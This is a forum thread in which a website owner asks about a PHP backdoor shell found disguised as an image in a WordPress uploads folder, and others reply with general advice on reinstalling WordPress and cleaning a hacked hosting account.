PHP/Backdoor shell

I was backing up my files via FTP from Godaddy where I have several websites hosted. When I hit the one website of mine honda repair videos I downloaded a file in \wp-content\uploads\favicon\bacground.png

AVG says process name is C:\Windows\System32\SearchProtocolHost.exe

AVG gives me this -http://www.avgthreatlabs.com/ww-en/virus-and-malware-information/info/php-backdoor-shell/?name=PHP/BackDoor.Shell&utm_source=TDPU&utm_medium=RS&PRTYPE=AVF&utm_expid=34410884-35.jDed7UusRQ2w2Dh2BoWHZA.0


My questions are the obvious.

1. How did this file get here? Was it uploaded by me? (Meaning its a virus on my computer)
2. What would this file do on a hosting account? What AVG is telling me sounds pretty bad. That being said why did Godaddy not notice this?

 

Keep in mind that it could be a false positive, too. That does happen. I don't know why AVG is reporting a process name that is not the file you suspect may be a malware.

Hosting accounts can get hacked in all sorts of ways. One of the biggest is using an outdated CMS or plugin. Odds are it was not uploaded by you and that your system is not compromised. If there is a compromise, it is likely on your hosting account.

Problem is that hackers like to stick in hidden back doors when they infect a hosting account so if the original back door is found, they have another way in. If you think you have been hacked, you can do a fresh install of Wordpress, reimport your database (check your database posts for malicious javascript or iframes), and putting your uploads back eyeball them to make sure they are all png, jpg, gif, etc. Basically, deleting any exploitable file in your hosting account and starting with fresh files. Then there cannot be a back door. You may have been hacked through other add-on websites you are hosting as well. If you have been hacked.

 

so how can I tell if it is a false positive? I was hacked about a year ago. Even made a post here on DP a year ago roughly. I still have the files on godaddys server. So I can find out if there is some alternative way to see if its infected.

And whoever did hack me a year ago managed to put a base64 code in every index.php and index.html file on my server.

 

Given that you were hacked, I would treat it as a real positive and not a false positive.

You can install fresh Wordpress files and that will get rid of any exploits provided you check your custom theme files for any malicious code and also check your uploads folder for anything suspicious. Then you can search through your database for javascript or iframes that do not belong there (you can search the internet and find queries to do this). Should not take too long to get this fixed up. You would be best to move your existing and possibly infected files to another folder for a backup and block access using a "deny from all" in htaccess. Just replace anything that may be infected with files you know are not infected.